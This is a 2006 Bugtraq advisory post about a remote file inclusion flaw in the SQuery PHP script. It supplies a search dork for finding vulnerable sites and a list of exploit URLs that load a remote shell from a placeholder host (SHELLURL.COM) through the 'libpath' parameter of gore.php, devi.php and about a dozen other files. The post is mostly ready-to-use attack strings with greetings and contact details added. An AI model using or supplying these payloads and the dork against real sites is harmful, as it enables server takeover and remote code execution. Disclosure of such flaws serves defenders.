
Date: 24 Jul 2006 18:14:14 -0000
From: saudi.unix@...mail.com
To: bugtraq@...urityfocus.com
Subject: SQuery v.x (devi.php) (armygame.php) Remote File Inclusion

================================================================= 
SQuery <= 4.5(libpath) Remote File Inclusion Exploit            
=================================================================
Worked On : ALL VERSIONS                                         |
                                                                 |
Critical Level : Dangerous                                       |
                                                                 |
Gug Found In : gore.php                                          |
=================================================================
Dork :  "SQuery 4.5" |"SQuery 4.0" |"SQuery 3.9" | inurl:"modules.php?name=SQuery"

http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM?
===============================================================================
Discoverd By : SHiKaA
Conatact : SHiKaA-[at]hotmail.com

__----___----____-----____----

and Discoverd By : saudi hackrz
 The breath of the error in another files
---------
SQuery/lib/devi.php?libpath=http://SHELLURL.COM?

------
SQuery/lib/armygame.php?libpath=http://SHELLURL.COM?

-------
SQuery/lib/ase.php?libpath=http://SHELLURL.COM?

---------
SQuery/lib/doom3.php?libpath=http://SHELLURL.COM?

---------
SQuery/lib/et.php?libpath=http://SHELLURL.COM?

---------
SQuery/lib/flashpoint.php?libpath=http://SHELLURL.COM?

---------
SQuery/lib/gsvari.php?libpath=http://SHELLURL.COM?
----------
SQuery/lib/halo.php?libpath=http://SHELLURL.COM?
----------
SQuery/lib/hlife.php?libpath=http://SHELLURL.COM?
----------
SQuery/lib/hlife2.php?libpath=http://SHELLURL.COM?
----------
SQuery/lib/igi2.php?libpath=http://SHELLURL.COM?
---------
 There many Verily that was content with this

greatz:

~~~~~

SnIpEr.SA , KING18, BLACK HOURS, AL-ARAAB,

------------------------------------------------------------------------
-------

Contact:

~~~~~~~

Nick: saudi hackrz

E-mail: saudi.unix[at]hotmail[dot]Com

site: http://www.3asfh.net

